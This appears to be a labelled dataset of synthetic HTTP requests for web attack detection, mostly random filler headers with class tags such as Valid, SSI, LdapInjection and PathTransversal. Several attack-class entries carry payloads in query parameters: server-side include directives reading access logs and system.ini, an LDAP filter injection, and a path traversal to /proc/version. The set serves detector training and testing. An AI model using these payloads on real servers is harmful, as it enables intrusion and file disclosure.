PUT /it650LHs0ya5telnetR/rtKralngmuele0/cbE2obhURXHC/isd34fMOi0gV8SkS_J4q/hehrmmehanerxdy3yoa/q.JBUQ_Ou/0OinHnpassthru1xp_OD/oisnlEeRe/_ttelnetl_zOdpT.htm? HTTP/1.1
Content-Length: 197
Content-Language: koATYn
Content-Encoding: deflate
Content-Location: /iii0e.sh
Content-MD5: d25vMmhveWVsZXltbXJvMw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Nov 04 22:21:32 GMT
Last-Modified: Mon, 08 Feb 10 20:40:57 CET
Host: 248.214.238.0
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 225.81.63.93
Cookie: ne=icaaw
Cookie2: $Version="15"
Date: Mon, 26 Jan 09 19:39:42 CET
ETag: "OBRpOLDexlTKNOercvA"
Expect: 100-continue
From: arra@bopdn.biz
If-Modified-Since: Sat, 16 Dec 06 18:08:55 CET
If-Unmodified-Since: Tue, 25 Nov 08 19:40:36 UTC
If-Match: "LNCLCqXJs.E2x478RY"
If-None-Match: *
If-Range: "9Hxph_l6SLtvYMR9Ro"
Max-Forwards: 844
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dDlyN2JkTzpuaVRpbGh1
Authorization: Digest nc=dAee4Eab
Range: 02748-,068714-
Referer: /pefr/eVeuit/tAaaryi3/seofd.wav
TE: trailers,gzip;q=0.4,chunked
Trailer: Authorization
User-Agent: rrdO/8.6.2.7.8
UA-CPU: MIPS
UA-Disp: 2518,5185,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 460x027
Via: 7.1 www.dopinnm4.tiff, FTP/5.0 87.104.122.134, 2.7 www.sRtet.gif
Transfer-Encoding: gzip
Upgrade: AilEi/1.3, 6Hr/2.8, hptud/0.4, eEn2iq/8.2
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hfudeo= )nQtry0shtpassSHlb8&suae=s e&siriszhnis=205&rz0lsT0esa=ahselectkalinkwNteutush~1r&tfEwrStOnnDdbn=0824590526&sjyit=smmrv&nbdwaanddece=4i&.m2VG5=ihca3rraaaeml&3select8P=tlU&t8sdsto=winnte

End - Id: 33459
Start - Id: 28858
class: Valid
GET /ulcX-_195ZccSC0nK/dac_7/kI/hY5F7/eRIdmK_rk0frEw7K/nV_-O/euezr7svy5op/nhlgap/linprweu1woeinrs/i.EEvOXX0jzdg/iMtjroedhAoyVnrijpak.js?tjdigecent=Gxp_n&l4n7dts=ypJ3uu&eqno3s=05803&le5siDc=105&sy8ln=04588&t4=75&rdo=3521&1uuss=s2OHu8W&EgxlieaeHl=sbhcotvsdharA&no=yeh%3Baccess_logfNgautoexecuiidbtoxuaGi&gbOnid=%3Alibdmochanc&ehs3iiBlIf4oee=%7E+ HTTP/1.0
Host: 51.4.148.52:31
Connection: i8csnlFe
Accept: video/quicktime, text/html, video/quicktime;q=0.2
Accept-Charset: iso-8859-1, hz-gb-2312, windows-1258;q=0.9, x-mac-japanese
Accept-Encoding: *
Accept-Language: d6-thgE
Cache-Control: max-stale=18377
Client-ip: 54.76.144.41
Cookie: ptoojrpaaahwe=3878;fgdwhemRiTuwogu=l0rBPGIa0WX;5aihbbNuu=mg3/;IdhraoaiMk=nSdTzr;uelcnsaonBuH9s=766214129;M2xmlpIgr=2584397
Cookie2: $Version="402"
Date: Fri, 08 Dec 06 15:39:30 CET
ETag: W/"IHA-3nrxci2TQoRq0U"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Wed, 03 Jun 09 22:04:52 CET
If-Unmodified-Since: Mon, 23 Jan 06 04:43:07 CET
If-Match: *
If-None-Match: "HabrnB.L2BOjyfFL"
If-Range: "HIq34CbGFfNpRnhN"
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic cjJhazplbmlDdWZp
Authorization: Basic bmhoa1F0a2k6c3N0b2M=
Range: -0,-10
Referer: http://www.reslaao.ch/nlfaso/gbTe/aani/idoh3i/sktfneV.msf
TE: deflate
Trailer: If-Modified-Since
User-Agent: 8thlLiagrEtngoqt
UA-CPU: x86
UA-Disp: 246,885,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 122x5513
Via: HTTP/1.7 151.137.117.19, FTP/5.0 www.Ete7.jpeg
Transfer-Encoding: gzip
Upgrade: utaps/8.7, onEusT/9.3
Warning: 052 www.sEcXniz.tiff:364 "yi1rf3pheepna5h" 
X-Forwarded-For: 102.241.28.31
X-Serial-Number: 687925565922143
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28858
Start - Id: 39584
class: SSI
GET /8BWa3QSEHdyU9/orffimTgchOqeznsqs/l@_4MaV@knrGlf/okD_iUTRKV/l4vtx2m/mAiqesixpa/da0TraiE/WeiHJomWfromg7GqTI/PqYCZp/hfTahz/ge.php3?euTtnoooTo=g%27&hdFl5ohotN=w9oti3aeo&sdNSe1nejiaa=805&srurecklcio=e.tPELB.UJ&gcdcl5an=2mn%282anh&idePbgrtr=5&LmFW3j=d3Pz&relnuanh=7Ba&uBeOcw7sdrhax=soieErr&5enldrrvcnz=2&ahiemlA=xterms%25%7Cor5e8mocharg+ttr&eT53lmLx3ol=%3D3&eqplkttOHaleoc=%3C%21--%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E HTTP/1.1
Host: www.iE6iilJhsu.st
Connection: close
Accept: image/*, video/*
Accept-Charset: koi8-r, x-mac-korean;q=0.3, iso-2022-jp;q=0.2, euc-jp;q=0.7, shift_jis
Accept-Encoding: identity;q=0.3, gzip, compress, compress, gzip
Accept-Language: ttyita-ynnaoe, i-nuo;q=0.7, eReRy-breehhss
Cache-Control: no-store
Client-ip: 241.190.56.140
Cookie: od=gotl5epaEhiries9i;egtohsT3haet=Tfeutertge6touconnectc;fihhgoev= nsD;ianeetga=4021668
Cookie2: $Version="523"
Date: Sun, 04 Apr 04 11:51:14 GMT
ETag: "QQaFNHDxvsmJsy85@QP"
If-Modified-Since: Sun, 04 May 08 16:13:38 GMT
If-Unmodified-Since: Fri, 07 Jan 05 14:28:19 GMT
If-Match: *
If-Range: *
Max-Forwards: 9
Pragma: rnnehwl='m0n54'
Authorization: NTLM bW9vZDZyaW9pZW45Ym5oVGV5bzJlcmFlZWdIdXJncm8=
Range: 5591-,251722-40474
Referer: http://www.nedo.fr/7n7tAtt.exe
User-Agent: 8sqooste (nBAiDd8; fBlpUD.L; sPOd93; r9RysseeV; a11Btm5k)
UA-Disp: 779,442,32
Via: mslntd/8.8 232.20.211.46
Transfer-Encoding: deflate
Upgrade: oshili/5.5, wen/5.9

null

End - Id: 39584
Start - Id: 16866
class: Valid
GET /ge25pgstAeieadNdr90n/jxcist/ev1XMR24t1@dU/ebt2ycs3/ssccrusTPwe/avaNthEath0ts/uhab327nmpRI1dlW/6deOgh/ip8Q.MSt9r5/lpinsertrmTexec@BlLJ-g.pl?wu9arnstne=8602622308&kia0ipitGzihi=gdpo&twbu=%5C-sOl&h7vnml=2481&4mKXAG=36132366&idlimc9po8=9DtM2gu_&SnnghtE=es-S&dSMQI=2Em0edqbinge HTTP/1.1
Host: www.dtrrh6l.de:5
Connection: keep-alive
Accept: text/*;q=0.3, audio/x-wav
Accept-Charset: koi8-r
Accept-Encoding: identity
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 52.90.4.126
Cookie: y3l2noqewclwyno=erl5efe 2;dS=h;eijL6xy=eLeiotatm;thypfpara9ecirv=76
Cookie2: $Version="9"
Date: Sat, 24 Nov 07 09:16:39 UTC
ETag: W/"eBIFZ7cqCEyqPiQYq"
Expect: eadt7tHr
From: oieuzw@OnwCatDke.cz
If-Modified-Since: Sat, 29 Oct 05 08:33:04 UTC
If-Unmodified-Since: Wed, 19 Apr 06 12:18:13 GMT
If-Match: "J9wr5BYVm3Bp2KUJMX3"
If-None-Match: *
If-Range: "IhseubsoH8D2PRG"
Max-Forwards: 901
MIME-Version: 8.8
Pragma: pH='rrsaDn'
Proxy-Authorization: Basic aG5laXc6ZGxxblU=
Authorization: Basic YW50cmlpOmVydnJyYWNt
Range: -70,5-305
Referer: http://TEeia.fr/3ethg/tdbkybbh.mspx
TE: gzip,trailers,trailers
Trailer: Trailer
User-Agent: efiqtnu/6.9.5
UA-CPU: Sparc
UA-Disp: 872,848,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x8989
Via: 7.0 84.1.0.194, 3ie2/4.2 132.60.41.157, FTP/8.3 www.rohssrc.shtml
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 31.2.130.137
X-Serial-Number: 926077
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16866
Start - Id: 38842
class: LdapInjection
GET /seullekl1tzbdFexttd/rle/2asr/NATU/WoRb4.tiff?hgsinabwpzbaewe=%28%25gGtorm9acopy37nlw&1tLT1=INeltd&CI.hGZVqy=uaae%3Chriusc%3D+p+sa%27%27&prEi=0063762&sa7=e8Dge%29%28++++%7C%28rlhh6%3D*%29&or=oebetween&saotkaw=z2H3nefutNinmr&wntthl1tA=rWMJ8aviChy1&xdropshY@l=pe%3F%5Bo&T0reilnhfatet=2sdflgl&eivseutmteoaae=tneoerysrlos&e0anLte1=gMm_ HTTP/1.1
Host: 201.63.152.10
Connection: close
Accept: */*;q=0.1
Accept-Charset: big5;q=0.9, euc-jp;q=0.4
Accept-Encoding: compress, gzip;q=0.8, gzip, compress, identity
Accept-Language: eIjata-tOmt, tdmikssf-mr
Cache-Control: max-age=459
Client-ip: 247.197.51.53
Cookie: I@LSqTw=eLXmq.;Lbpionenc=EolatfuiqAaaSabhre
Cookie2: $Version="98"
Date: Wed, 03 Sep 08 11:15:21 UTC
ETag: W/"MCchZ@rU6f2cadf"
Expect: 100-continue
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Thu, 29 Apr 10 01:05:40 GMT
If-Unmodified-Since: Fri, 17 Jul 09 05:01:14 GMT
If-Match: "XH5-bSPYDo.7hPTVRj"
If-None-Match: "NJtkfLmi6WnH-YQI"
If-Range: *
Max-Forwards: 88
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest realm
Range: 9339-
Referer: http://rs09mtx.gov/iirt/mohsrL/eqph.wmn
TE: gzip;q=0.5,trailers
Trailer: Via
User-Agent: Mozilla/6.8 (Machintosh; U; Mac OS X 2.3; 93-oa; rv:1.0.9) Gecko/35983419
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: HTTP/8.4 26.230.238.175
Transfer-Encoding: compress
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 465738
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38842
Start - Id: 8478
class: Valid
GET /tloi/t5kXeqf/eiaustr09oertddted/YP-IUMO8documentshutdown/bOSc4/motTgvdLoe/gOn4ND/taradl1duFbets6o/rXTlleg_t/aqlwste4eenoerc5htc/wGcruuFLBn7-h06H_o/yrT6NXRh6gJcROYtVH4.jsp?nnEssenyh=+tuIrT+drza4vbhk%7Ese HTTP/1.0
Host: www.encoeet2d.fr
Connection: keep-alive
Accept: text/html, audio/basic;q=0.1, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 127.44.88.61
Cookie: otoEeaucgpoO=48;HBPAdzwindow.open_CI=h w zcats;R0UAYDM=iZb.6Mk;dease0=noleniayotdtaot;te=sintha
Cookie2: $Version="81"
Date: Wed, 07 Mar 07 06:44:07 GMT
ETag: "x-0vskwvvt.CtBrpiL@m"
Expect: btNrwRS=esgoei
From: uifIa@nthr.st
If-Modified-Since: Fri, 18 May 07 12:49:12 GMT
If-Unmodified-Since: Fri, 04 Apr 08 13:12:54 CET
If-Match: "lOnQe0.-YL2DxOENy"
If-None-Match: "lZWOTtZJWnD4NFR"
If-Range: Sun, 24 Sep 06 15:39:33 GMT
Max-Forwards: 85
MIME-Version: 1.6
Pragma: Ygay3oc='o4gjk'
Proxy-Authorization: Basic ZWRpdWVxaWE6Nmxvb2k=
Authorization: Digest uri=http://hoaySb.ch/uoaezlso/iAAhte/Euct/ie5d/hhheaIxf.ace
Range: 27626-91
Referer: /aiIww/nlnsY6h/tRege/ssntct/3eit.shtml
TE: gzip;q=0.2
Trailer: Via
User-Agent: lkbtsaj (sxXMMbm; 5z2Lk4UXtv; lj5eRkuh-O; e_8DFKJU6v)
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8509x9996
Via: HTTP/3.9 6.185.39.120, FTP/2.8 29.237.246.10, 5.0 www.atem.html
Transfer-Encoding: compress
Upgrade: odk/7.0
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 15.12.43.118
X-Serial-Number: 3858691762
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8478
Start - Id: 46128
class: PathTransversal
GET /h8I27JOYr/4mochaWNAgXHi.tiff?heah0ra=Ao%7E1Prhcnmg&1tth7e=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&vtinarye=tcMQzw2EY&tasihm=txp_ol&ws3rjnTnbhpEieh=gXiNjjC6_50p&tosfeurlc6oL=%3CtLFeyc4n%3Fal&7ec8rogeHieeetE=4003&6oo=oOz&ftrrieS0nIi=hPj%5CtIn&grwqlbdsl=iI0epbi HTTP/1.1
Host: www.Jmtotmian.com
Connection: close
Accept: audio/*;q=0.1, image/*;q=0.1
Accept-Charset: iso-8859-9;q=0.2, x-mac-arabic, iso-8859-2, x-mac-roman;q=0.3
Accept-Encoding: deflate;q=0.5
Accept-Language: eSy-ors;q=0.4, snR-i0e4eb, erros-o1e;q=0.3
Cache-Control: max-age=34253
Date: Sun, 27 Dec 09 10:08:44 GMT
ETag: W/"L3OoBM0r1pRvJnxsFE0"
Expect: 100-continue
From: toen@mrc7a3t8h.de
If-Modified-Since: Tue, 13 Jan 04 12:40:54 UTC
If-Unmodified-Since: Wed, 25 Jun 08 09:47:21 CET
If-Range: Mon, 27 Sep 04 10:27:45 UTC
Pragma: byd=bdsaos
Proxy-Authorization: Digest algorithm=MD5-sess
Referer: http://eNvpia.gov/iyTa.aspx
User-Agent: rHN_f1a http://www.tm9trtsf.biz
Transfer-Encoding: ihnh9t
Upgrade: ftobhh/1.0
X-Serial-Number: 83931

null

End - Id: 46128
Start - Id: 29296
class: Valid
GET /6ltor5zitftstsmZ/AOL_HaJlV3/Vjbosche/nuhgevauehnnld9wk7bo/rltcd/c-B0/yB/vlyEorg7Q/v4P7_82NRmE3HO9/eNxP8xlW6bdvc4OWV/tI194rJ.m/Ry3.tiff?ann=0wc&agfrbte7=1280278&toO=eaNtuizmngiqs2h&eype=5_PHWoo&DtatTle=06744853&prt=09&eaqtaYtesfceOs=19880&hatd7cs=712440&8_ZD5.Rhaving@W=eed%5CoA9osjebnlike HTTP/1.0
Host: 90.78.172.59
Connection: close
Accept: application/*, image/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: tnseAati='or8'
Client-ip: 119.191.131.207
Cookie: oatu8dolCddia=9234626669;5IE89TOyVj9=hNlosl ;y3re1vs7sO2Yl=oeiJDmMwv;tM=9' a
Cookie2: $Version="359"
Date: Wed, 12 Dec 07 23:18:23 CET
ETag: "E8uDSlAD4aIkr5RjxX"
Expect: oeBm
From: taaeue@roYoeystjd.gov
If-Modified-Since: Sat, 18 Oct 08 08:24:41 CET
If-Unmodified-Since: Fri, 24 Jun 05 22:05:23 CET
If-Match: "rG89Pk5P.CgP56Ip"
If-None-Match: *
If-Range: *
Max-Forwards: 66
MIME-Version: 9.9
Pragma: eitd='eetnlekf'
Proxy-Authorization: Digest realm
Authorization: NTLM aGhjeGRlb2lpbHlTaGxIYW1nbmt6VDczZGFjdHNxc1NpZWlJdGhoZGFy
Range: 26325-226828,6-
Referer: http://fddS.it/abednkto/g8egasIb/yeeo.mdb
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.2 (Windows; U; Win98 6.6; il-t4; rv:4.3.6) Gecko/83330483
UA-CPU: 68000
UA-Disp: 640,917,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8762x9260
Via: 3.3 www.dohwnm.html, 7.5 www.do5Env.htm, HTTP/5.7 48.6.146.97
Transfer-Encoding: gzip
Upgrade: pT60yE/0.0, eKur/8.8, tebei2/3.1, ee1am/8.4
Warning: 150 www.dawin.css:2223 "eitisd8hsedi" "Sun, 06 Feb 05 24:39:20 GMT"
X-Forwarded-For: 88.145.158.81
X-Serial-Number: 892680378227754
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29296
Start - Id: 35015
class: SSI
GET /teDCV/5xhdai2tlaliexbdn.php?estnlEieerrlm2e=e&nto=rKehDL&i0allXlikeHCUAdocumentl=%3C%21--+%23odbc+++++connect%3D%22siecbf%2Clpo%2Camd%22++++++++++statement%3D%22select+*+++++from+++e%22--%3E HTTP/1.1
Host: 83.159.133.37
Connection: Roloqmrl
Accept: */*;q=0.1
Accept-Charset: iso-8859-5, iso-8859-5, x-mac-greek;q=0.3
Accept-Encoding: 
Accept-Language: eaa-tyT;q=0.7
Cache-Control: no-cache
Client-ip: 4.200.130.247
Cookie: w6t4sep=paeIjarmsa;Ngdoltnn=qnr?h4<iqgaVd
Cookie2: $Version="03"
Date: Mon, 26 Jan 04 16:22:51 CET
ETag: "tQT9H2LAAyiNEevik"
Expect: 100-continue
If-Modified-Since: Sat, 14 Aug 04 18:09:52 UTC
If-Unmodified-Since: Mon, 06 Nov 06 10:14:42 UTC
If-Match: *
If-None-Match: "EpxhN-4iy1uzbvI"
If-Range: Mon, 20 Apr 09 12:11:18 CET
Max-Forwards: 48
MIME-Version: 0.3
Pragma: ims=nossnbl
Authorization: Digest opaque="hSatry"
Range: 4978-84,830195-719467,3968-5663
Referer: /deiyaocl.avi
TE: trailers
Trailer: Authorization
User-Agent: atnCEMeki (jNW1viK)
Via: 4.8 www.5itsnrY.tiff
Transfer-Encoding: compress
Upgrade: h7d/2.3
~~~~~: ~~~~~~~~~~

null

End - Id: 35015
Start - Id: 3685
class: Valid
GET /Mltwath8eatirsne/d6selectlf/oyn@45EXGXOqLK.bin?EzAlNR=5athhdBob4taog&a3rtcrjo5r471e=g-bigHmpJ&CE7K=40303993&-soqd=1863&COYupdateYet-bform=550&ts=ie HTTP/1.0
Host: 95.252.253.94
Connection: close
Accept: image/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: nteq6-7l;q=0.6, 2-ta;q=0.1, nBienx-N, 9Ink-wxef1, n-rqan8Le
Cache-Control: no-store
Client-ip: 96.20.101.191
Cookie: crt=?nznI;teastr=ctie;loNasse8ms=n(<includelocationdrn;enrneS=605993;pzxcmtPcaehttue=+Ad1%;mpt7lrorafntZsi=41900
Cookie2: $Version="66"
Date: Wed, 02 Feb 05 10:18:56 CET
ETag: W/"tYocNHVY96Z_wzgnl"
Expect: s45e
From: msqr@3sAneh.gov
If-Modified-Since: Sat, 24 Jul 04 17:16:04 GMT
If-Unmodified-Since: Sat, 06 Feb 10 02:25:51 UTC
If-Match: *
If-None-Match: "klrSX8PR@6GBHrR"
If-Range: "7TONY14QovMbfS6gIv_i"
Max-Forwards: 07
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: 2nsn hBbdTAE=enci
Authorization: Digest qop=auth-int
Referer: http://siuMs.it/rdnTr.zip
TE: gzip;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/4.7 (compatible; MSIE 8.3; Unix; eloI)
UA-Disp: 7385,2023,32
UA-OS: Mac OS X
Via: 5.4 214.241.104.98, 8.9 www.lde9zRn.tiff
Transfer-Encoding: deflate
Upgrade: oem/9.0
Warning: 881 204.8.105.138 "5ptueh5" 
X-Forwarded-For: 244.94.150.34
----: -----------------

null

End - Id: 3685
Start - Id: 10304
class: Valid
GET /ysLrsOAheees/a4BR2epvg5L-RwTKT/oaxeC/tfc2rOttNa/a4VcBn4EI0z5dTcEK.gif?I2bmWRwtaixcesd=sc&ujesed=18&stv5lCreasb8r2b=26385809&erahhhsk=lT5LL0&15t=%3Br%26i&efi2hhuienia=E+6aihcmdas&tlcehwnz1eld=shAn80atja&hZFc9I-G-B=6&Qhse=25742&lsnlnakd=flaofsrurUm&te4edncE2dtnn=tv.9tZh9d&CzV4=boot.iniAgato6hcr5&tgrnncguo=ahxao HTTP/1.1
Host: www.iettpe.it
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: gzip, gzip, identity
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 42.80.49.249
Cookie: bhsij=413
Cookie2: $Version="15"
Date: Sun, 09 Jul 06 14:46:29 GMT
ETag: W/"fi7qZFX-_73wO95bbRb"
Expect: haMpl
From: or1sSi@yidae.it
If-Modified-Since: Sat, 23 Jan 10 09:33:04 UTC
If-Unmodified-Since: Tue, 06 Apr 04 18:33:33 CET
If-Match: "Y5kyXh43Ss3dtRUOVQP7"
If-None-Match: "O0_E_PRDakOBYtlppAwi"
If-Range: Fri, 11 Nov 05 19:15:26 UTC
Max-Forwards: 559
MIME-Version: 4.3
Pragma: e='e'
Proxy-Authorization: gx9nas 4au7d=n9Ge
Authorization: Digest qop=auth-int
Range: 12-5596
Referer: http://aasg.it/qtnSniha/jeeaAhl/mwvaO/vortsr6d.jsp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 1.4; Fe-eU; rv:2.9.5) Gecko/43505170
UA-CPU: 68000
UA-Disp: 2081,300,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 032x7737
Via: srx/9.6 www.ineoe.gif, 1.0 www.qten2sa.png
Transfer-Encoding: identity
Upgrade: sawiI/5.5, tetn/9.6, nngke/0.8, gdi/4.8
Warning: 089 77.21.70.73 "oeaacxztie0eaee7elv" "Wed, 05 Oct 05 21:11:47 UTC"
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 86455212
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10304
Start - Id: 5069
class: Valid
POST /Ndezdtsp4/6dUGvr8/pSm9bUTtuhuL./dXc/txwhc3Lkt2ySAL4/Neerttnlltnioe1meanE/ZTBexecO27Ov/KB/tqRSL_5JAEfLDh5Kuv8/nyrtyxnfee5uem/tiNybSLP/sx.gif? HTTP/1.0
Content-Length: 33
Content-Language: pEEreahn,utiet,heda6
Content-Encoding: identity
Content-Location: /eclNij.swf
Content-MD5: Y2VvZ2V0ZWFmaDJFb0F1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 May 08 24:52:37 GMT
Last-Modified: Thu, 08 Apr 04 03:30:13 UTC
Host: 76.6.19.217
Connection: close
Accept: */*
Accept-Charset: iso-8859-8;q=0.9, windows-1255;q=0.6, big5, windows-1251;q=0.0
Accept-Encoding: 
Accept-Language: 5iitnola-WIiaah;q=0.7, 7atrtr-a;q=0.9, 5Dt-e, euawooec-eeOnomc
Cache-Control: nfc=teee2x
Client-ip: 53.64.21.162
Cookie: VQrrhavingQyyC=einputm9e
Cookie2: $Version="684"
Date: Wed, 16 Aug 06 17:49:10 UTC
ETag: "ysQeb7HLdpYvo.M2T"
Expect: 100-continue
From: adhno@nitwillnza.be
If-Modified-Since: Tue, 05 Oct 04 05:19:37 CET
If-Unmodified-Since: Thu, 20 Sep 07 16:16:31 GMT
If-Match: *
If-None-Match: "Z3zpJizC0k65McRw"
If-Range: *
Max-Forwards: 7205
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Digest nc=F2d7aDbd
Range: 818-,7964-381
Referer: /ozeed7/lw1aqA/tn7srnzn.pl
TE: trailers,trailers
Trailer: Host
User-Agent: l1ai (2xJwZcDf; uWvQdm7)
UA-CPU: PowerPC
UA-Disp: 925,165,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7508x091
Via: FTP/4.9 65.6.8.170, HTTP/9.5 247.59.71.23:7640
Transfer-Encoding: deflate
Upgrade: fnget0/9.0, Hrn/8.2
Warning: 467 150.166.100.47 "uemut595tnsdte" "Mon, 06 Dec 04 06:40:13 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

s7tpcohz=csh0cwct&tstdinn1af=0464

End - Id: 5069
Start - Id: 20487
class: Valid
GET /cifImzjtcMo/wJZ_h/aaolj09eaaht/rgTNXZ/hibrnytsco6/ils/waawenethm/dytI658@htpass5uscript.msf?nudgmtr=%3A%3A1uvcrEneey&rEmteoS5rkudNe=25308581&dho2h5cnao8k=aas5hoieyRteTM&H6b=l4yOycriirI%3Fyt&tlu84ti6Olc=h&ntftogdb=16530697&riicnbi6sb=1&qKaNj=nbupsueyesrl37aeh&e71e5lo2esRnaeu=qgdjw9bdea5tW&irefoixa=164517 HTTP/1.0
Host: www.iDOFd8m.cz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.1, compress;q=0.6, compress;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 14.223.45.144
Cookie: KHdTBT=677179;f4tt6itnEeipdh=O0;ryl=hrscriptf;iEr2nufsx64rd= emdropf<\kftpdsystemconnectrinsertMsbins;atotrhoneheerGR=4311423588;ftD=mtG k]R no3
Cookie2: $Version="7"
Date: Mon, 05 Apr 04 12:59:23 CET
ETag: "jih6IG9MEkx3XcI8"
Expect: xakt=laq4H7
From: dsreo@aregoinma.st
If-Modified-Since: Fri, 09 Apr 10 13:49:58 CET
If-Unmodified-Since: Sat, 18 Sep 04 08:41:36 CET
If-Match: *
If-None-Match: *
If-Range: "yTpRKWNUHQlY_0YK"
Max-Forwards: 3
MIME-Version: 4.7
Pragma: Jo='et69'
Proxy-Authorization: Basic c25FaXRiOnNhZWJ1
Authorization: Basic dDlsNVN1bnU6cGxlYWVwYXU=
Range: 382-7
Referer: /elSmav/ttlWn.css
TE: trailers
Trailer: From
User-Agent: S2azxwoadc (rq._C8wqQ; dsGvmlvUoq; sPJVWX_5)
UA-CPU: MIPS
UA-Disp: 428,0883,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3372x6941
Via: 6.3 95.192.178.33, 9.5 www.oWzahse.html:0, HTTP/6.2 www.viQueAsi.shtml
Transfer-Encoding: gzip
Upgrade: esoio/0.9
Warning: 199 www.ztlqcle.jpeg:4074 "oikhvtxteeeeatnI" "Wed, 14 Feb 07 19:29:02 UTC"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 025237618
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20487
Start - Id: 40540
class: SSI
GET /deonAhie6mnraaaauwaa.pl?y8ohitla=850524988&sld=67928081&Re5insert9_W=y0bYskifnFq&qnmtovge6ttmW86=e4o&akztOlwSqpw=42531126&.FXcxX=c+%25en&edrdp=0937573&ffoiPelhaid8=adns&tjfi2icmchg=+91a&en4gn=%3C%21--+++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&RhuROusnxreuase=vdcaluTia HTTP/1.0
Host: www.iipmuooy.uk
Connection: close
Accept: text/*;q=0.9, audio/*;q=0.4
Accept-Charset: windows-1254;q=0.2
Accept-Encoding: 
Accept-Language: rfofe-uTxsbe, cH-dh, gWrer-faSzeMm;q=0.8, Sye-vagzgny;q=0.8
Cache-Control: o6aai='afttq'
Client-ip: 113.181.235.9
Cookie: Hse1he=qgf ioe;eoaifedahtmi=892687;hansyoEeDes=-@vbscript;jyBdsnvi=8;iuton3oxa=EaniogqWes;OhbvwLWaUVRaccess_log=715692
Cookie2: $Version="486"
Date: Sun, 08 Oct 06 16:06:57 CET
ETag: "m_1QcbAJRnR29@z"
Expect: i0maowi=ncan
From: Tttt4@mie9U0h4r.com
If-Modified-Since: Sun, 06 Jun 04 17:06:07 CET
If-Unmodified-Since: Mon, 01 Oct 07 08:31:51 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 97
MIME-Version: 8.9
Pragma: u='hXniuo'
Proxy-Authorization: CraSb laueyem=tibGopsi
Authorization: NTLM ZWk5YXRSaHJldGU1eXk4d3NhbHdlNzZrdGx0c25zbnB0bG9xb2V3b3NzYWVp
Range: -130317
Referer: http://tn9huuo.cz/dsRYxro/wRtowDt/Lewml4zl/NheaQl.mdb
TE: trailers
Trailer: Referer
User-Agent: bhbgmEt (lWTvRNhgot; uh_Jn8I; n.6G1C5; mZ3tye7; eg1KkJ)
UA-CPU: MIPS
UA-Disp: 373,5192,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3418x3633
